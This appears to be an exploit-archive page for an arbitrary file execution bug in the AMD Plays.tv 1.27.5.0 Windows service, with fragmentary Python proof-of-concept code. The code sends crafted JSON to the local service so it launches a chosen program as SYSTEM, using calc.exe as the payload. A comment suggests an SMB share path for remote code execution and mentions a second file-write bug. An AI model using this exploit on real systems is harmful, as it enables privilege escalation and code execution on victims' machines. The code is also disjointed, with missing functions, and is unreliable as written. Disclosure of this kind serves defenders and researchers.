Exploits / Vulnerability Discovered : 2018-04-15 |
Type : local |
Platform : windows
This exploit / vulnerability Amd plays.tv 1.27.5.0 plays_service.exe arbitrary file execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
########################################################################
# http://support.amd.com/en-us/download?cmpid=CCCOffline -
# Click "Automatically Detect - Download Now"
# Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
# OR
#
# https://plays.tv/download
#
# Target OS: Windows( Any )
# Privilege: SYSTEM
# Type: Arbitrary File Execution
#
# Notes: Second minor bug allows for arbitrary file write of
# uncontrolled data using the /extract_files path.
#
########################################################################
#add post data
try:
resp = urllib.request.urlopen(request, "data".encode("utf-8"))
return "[-] Not Raptr, Plays TV service"
except urllib.error.HTTPError as err:
error_message = err.read().decode("utf-8")
if error_message == 'Security failed - Missing hash or message[data]':
return "[+] Raptr, Plays TV service"
#add post data
p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
resp = urllib.request.urlopen(request, p_data)
return resp.read()
#Target IP address
ip = '127.0.0.1'
##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
port = 50452
##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution
data = {
"installer": cmd,
"appdata": cmd
}